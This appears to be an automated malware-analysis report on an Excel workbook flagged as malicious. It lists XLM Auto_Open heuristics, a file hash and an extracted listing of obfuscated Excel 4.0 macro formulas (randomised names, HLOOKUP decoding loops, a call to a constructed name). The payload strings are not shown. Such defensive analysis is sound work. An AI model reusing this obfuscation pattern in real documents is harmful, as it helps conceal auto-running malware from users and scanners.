Verdict: MALICIOUS
Risk Score: 140
Heuristics 3
- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream; XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6829 bytes |

SHA-256: 224140681dcd461f24c4d917024d1a355c44138e884e7cfba17ec0ea4c61be43

Preview script: first 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 20 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - FyltgGvFWZu
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!B174
' 0018 24 LABEL : Cell Value, String Constant - BHVUNqhWd len=0
' 0018 24 LABEL : Cell Value, String Constant - bYlVDbHwV len=0
' 0018 22 LABEL : Cell Value, String Constant - Bzxadjz len=0
' 0018 20 LABEL : Cell Value, String Constant - dmgmo len=0
' 0018 24 LABEL : Cell Value, String Constant - evGYfkiBC len=0
' 0018 22 LABEL : Cell Value, String Constant - fAuBWZG len=0
' 0018 20 LABEL : Cell Value, String Constant - FezRJ len=0
' 0018 23 LABEL : Cell Value, String Constant - FkmAGKkU len=0
' 0018 26 LABEL : Cell Value, String Constant - FNIviQXQOdp len=0
' 0018 21 LABEL : Cell Value, String Constant - gDfGIA len=0
' 0018 24 LABEL : Cell Value, String Constant - HZVFVPaEv len=0
' 0018 24 LABEL : Cell Value, String Constant - kqjArSrqP len=0
' 0018 21 LABEL : Cell Value, String Constant - oIeCjj len=0
' 0018 25 LABEL : Cell Value, String Constant - sAPSjmzEkr len=0
' 0018 22 LABEL : Cell Value, String Constant - SoIScaE len=0
' 0018 20 LABEL : Cell Value, String Constant - TRvAP len=0
' 0018 24 LABEL : Cell Value, String Constant - UduNuybRl len=0
' 0018 26 LABEL : Cell Value, String Constant - vMeiwKDload len=0
' 0018 23 LABEL : Cell Value, String Constant - WbfhQuOG len=0
' 0018 20 LABEL : Cell Value, String Constant - xaHcd len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' FyltgGvFWZu,R58,"",108.00000000000000000000
' FyltgGvFWZu,R59,"",-292.00000000000000000000
' FyltgGvFWZu,R60,"",243.00000000000000000000
' FyltgGvFWZu,R61,"",-1000.00000000000000000000
' FyltgGvFWZu,R62,"",-500.00000000000000000000
' FyltgGvFWZu,R63,"",532.00000000000000000000
' FyltgGvFWZu,B83,"SET.NAME("FezRJ",0+VALUE("0"))",""
' FyltgGvFWZu,B86,"SET.NAME("sAPSjmzEkr",FezRJ)",""
' FyltgGvFWZu,B88,"SET.NAME("oIeCjj",FezRJ)",""
' FyltgGvFWZu,B93,"SET.NAME("SoIScaE",COUNTA(WbfhQuOG))",""
' FyltgGvFWZu,B97,"SET.NAME("Bzxadjz",COUNTA(dmgmo))",""
' FyltgGvFWZu,B101,[],""
' FyltgGvFWZu,B106,"SET.NAME("TRvAP","")",""
' FyltgGvFWZu,B111,"sAPSjmzEkr",""
' FyltgGvFWZu,B113,"SET.NAME("gDfGIA",HLOOKUP("*",WbfhQuOG,sAPSjmzEkr,FALSE))",""
' FyltgGvFWZu,B116,"evGYfkiBC",""
' FyltgGvFWZu,B119,"SET.NAME("FkmAGKkU",FezRJ)",""
' FyltgGvFWZu,B122,[],""
' FyltgGvFWZu,B126,"FkmAGKkU",""
' FyltgGvFWZu,B131,"UduNuybRl",""
' FyltgGvFWZu,B135,"xaHcd",""
' FyltgGvFWZu,B140,"FNIviQXQOdp",""
' FyltgGvFWZu,B144,"SET.NAME("fAuBWZG",VALUE(HLOOKUP("*",dmgmo,FNIviQXQOdp,FALSE)))",""
' FyltgGvFWZu,B146,"BHVUNqhWd",""
' FyltgGvFWZu,B149,"TRvAP",""
' FyltgGvFWZu,B153,"oIeCjj",""
' FyltgGvFWZu,B157,NEXT(),""
' FyltgGvFWZu,B160,"HZVFVPaEv",""
' FyltgGvFWZu,B164,[],""
' FyltgGvFWZu,B167,"kqjArSrqP",""
' FyltgGvFWZu,B169,NEXT(),""
' FyltgGvFWZu,B172,RETURN(),""
' FyltgGvFWZu,B198,"SET.NAME("vMeiwKDload",B83)",""
' FyltgGvFWZu,B201,"WbfhQuOG",""
' FyltgGvFWZu,B203,"SET.NAME("dmgmo",R49C12)",""
' FyltgGvFWZu,B207,"SET.NAME("kqjArSrqP",214)",""
' FyltgGvFWZu,B210,"SET.NAME("bYlVDbHwV",2)",""
' FyltgGvFWZu,B213,vMeiwKDload(),""
' FyltgGvFWZu,B214,HALT(),""